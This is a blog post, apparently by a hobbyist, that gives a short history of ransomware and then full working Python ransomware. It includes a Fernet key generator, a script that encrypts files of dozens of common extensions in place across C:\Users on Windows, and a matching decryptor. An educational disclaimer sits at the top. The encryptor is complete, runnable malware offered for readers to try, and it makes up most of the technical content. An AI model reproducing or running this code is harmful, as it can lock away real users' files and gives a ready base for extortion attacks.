DISCLAIMER:
THE CONTENT OF THIS POST IS INTENDED FOR EDUCATIONAL PURPOSES ONLY. THE INFORMATION PROVIDED IS DESIGNED TO ENHANCE UNDERSTANDING AND AWARENESS ABOUT RANSOMWARE AND THEIR IMPLICATIONS IN CYBERSECURITY. IT IS NOT MEANT TO ENCOURAGE UNAUTHORIZED OR ILLEGAL ACTIVITIES. READERS ARE ADVISED TO USE THE KNOWLEDGE GAINED FROM THIS POST RESPONSIBLY AND ETHICALLY, ADHERING TO ALL APPLICABLE LAWS AND REGULATIONS REGARDING PRIVACY AND DATA PROTECTION.
In the ever-evolving landscape of cybersecurity threats, ransomware stands out as a particularly insidious type of malware. It’s a digital extortion tool that locks away the victim’s data, demanding a ransom for its release. The concept is simple yet devastating: your files are encrypted by the attacker, and without the decryption key, they’re as good as gone. To add insult to injury, the ransom usually comes in the form of hard-to-trace cryptocurrencies, making it a nightmare to deal with both technically and legally.
The origins of ransomware can be traced back to the late 1980s, with the first documented case being the AIDS Trojan. This early example set the stage for what would become a global threat, evolving rapidly with the internet’s expansion. By the mid-2010s, ransomware had become a common and feared weapon in the cybercriminal arsenal, with notorious variants like CryptoLocker and WannaCry causing widespread havoc.
But ransomware isn’t just about locking files anymore. The tactics have grown more sophisticated, with double and even triple extortion techniques. Attackers don’t just encrypt data; they steal it and threaten to leak sensitive information if their demands aren’t met. This evolution has raised the stakes significantly, making it a top concern for individuals and organizations alike.
Despite the grim picture, there’s a silver lining. As awareness of ransomware grows, so do the efforts to combat it. Cybersecurity professionals are developing more robust defense mechanisms, and many victims are now able to avoid paying ransoms by having secure backups and employing effective detection tools.
The history of ransomware is a testament to the cat-and-mouse game between cybercriminals and defenders. It’s a reminder that in the digital age, vigilance is key, and staying informed is our best defense. For a deeper dive into the technical workings and prevention strategies, resources like IBM’s guide on ransomware offer valuable insights.
I have been playing around with making some ransomware nothing like cybercriminals make, but just a little example and something i could get working. Normally they may have it travel through a network and do some considerable damage, stealing credentials and locking machines. Here it just locks some files in a directory, but you get a sense of how it does what it does.
I first start with creating a key for the encryption and decryption programs. I will use python and an import of fernet. Fernet guarantees that a message encrypted using it cannot be manipulated or read without the key. Fernet is an implementation of symmetric authenticated cryptography.
from cryptography.fernet import Fernet
# Generate a key
def generate_key():
return Fernet.generate_key()
# Save the key to a file
def save_key(key, file_path):
with open(file_path, "wb") as key_file:
key_file.write(key)
# Generate a key
key = generate_key()
# Save the key to a file
save_key(key, "key.key")
The key should be located in the directory that you run the program in.
import os
from cryptography.fernet import Fernet
# Load the key from the file
def load_key():
return open("key.key", "rb").read()
# Create a cipher suite
cipher_suite = Fernet(load_key())
# Define a function to encrypt a file
def encrypt_file(file_path):
# Read the file
with open(file_path, 'rb') as file:
file_data = file.read()
# Encrypt the file
encrypted_data = cipher_suite.encrypt(file_data)
# Overwrite the original file with the encrypted data
with open(file_path, 'wb') as file:
file.write(encrypted_data)
# Define a function to encrypt all files in a directory
def encrypt_all_files(directory_path, extensions):
# Iterate over all items in the directory
for root, dirs, files in os.walk(directory_path):
for name in files:
# Construct the full path
path = os.path.join(root, name)
# Skip hidden directories, 'AppData' directory, and 'ntuser' files
if path.startswith('.') or 'AppData' in path or path.startswith('ntuser'):
continue
# If it's a file, encrypt it
if os.path.isfile(path):
# Check if the file has one of the desired extensions
if any(path.endswith(ext) for ext in extensions):
try:
encrypt_file(path)
except Exception as e:
print(f"Skipping file due to error: {path}")
print(f"Error: {str(e)}")
# List of extensions
extensions = [
".txt", ".doc", ".docx", ".xls", ".xlsx", ".ppt", ".pptx", ".pdf",
".jpg", ".jpeg", ".png", ".gif", ".bmp", ".svg", ".webp",
".mp3", ".wav", ".ogg", ".flac", ".aac",
".mp4", ".avi", ".mov", ".flv", ".mkv", ".wmv",
".zip", ".rar", ".tar", ".gz", ".7z",
".py", ".js", ".html", ".css", ".php", ".java", ".c", ".cpp", ".h", ".cs",
".exe", ".dll", ".bat", ".sh", ".msi", ".sys", ".bin", ".udp"
]
# Call the function to encrypt all files in a directory
encrypt_all_files("C:\\Users", extensions)
This is the encryption program. I call on it to lock all files in the users folder on a windows 10. While building the code i added in skip hidden directory, it probably doesn’t need to be there now, but i have left it in. Since the rise of AI i do use it while writing code and it has helped a lot with code, it would take me longer to write if i didn’t use it.
import os
from cryptography.fernet import Fernet
# Load the key from the file
def load_key():
return open("key.key", "rb").read()
# Create a cipher suite
cipher_suite = Fernet(load_key())
# Define a function to decrypt a file
def decrypt_file(file_path):
try:
# Read the file
with open(file_path, 'rb') as file:
encrypted_data = file.read()
# Decrypt the file
decrypted_data = cipher_suite.decrypt(encrypted_data)
# Overwrite the original file with the decrypted data
with open(file_path, 'wb') as file:
file.write(decrypted_data)
except Exception as e:
print(f"Skipping file due to error: {file_path}")
print(f"Error: {str(e)}")
# Define a function to decrypt all files in a directory
def decrypt_all_files(directory_path, extensions):
# Iterate over all items in the directory
for root, dirs, files in os.walk(directory_path):
for name in files:
# Construct the full path
path = os.path.join(root, name)
# Skip hidden directories, 'AppData' directory, and 'ntuser' files
if path.startswith('.') or 'AppData' in path or path.startswith('ntuser'):
continue
# If it's a file, decrypt it
if os.path.isfile(path):
# Check if the file has one of the desired extensions
if any(path.endswith(ext) for ext in extensions):
decrypt_file(path)
# List of extensions
extensions = [
".txt", ".doc", ".docx", ".xls", ".xlsx", ".ppt", ".pptx", ".pdf",
".jpg", ".jpeg", ".png", ".gif", ".bmp", ".svg", ".webp",
".mp3", ".wav", ".ogg", ".flac", ".aac",
".mp4", ".avi", ".mov", ".flv", ".mkv", ".wmv",
".zip", ".rar", ".tar", ".gz", ".7z",
".py", ".js", ".html", ".css", ".php", ".java", ".c", ".cpp", ".h", ".cs",
".exe", ".dll", ".bat", ".sh", ".msi", ".sys", ".bin", "udp"
]
# Call the function to decrypt all files in a directory
decrypt_all_files("C:\\Users", extensions)
Here is the decrypt version. If you are going to practice with any of this code make sure you keep a back up of the decryption program, key and any files you don’t want to loose. Make sure you run it in a safe environment.
As we continue to rely more on digital infrastructures, understanding threats like ransomware becomes crucial. It’s not just about protecting data; it’s about safeguarding our way of life in the interconnected world of today and tomorrow. So, let’s keep the conversation going, share knowledge, and build a safer digital future for everyone.
StealthCyberOps 
Leave a comment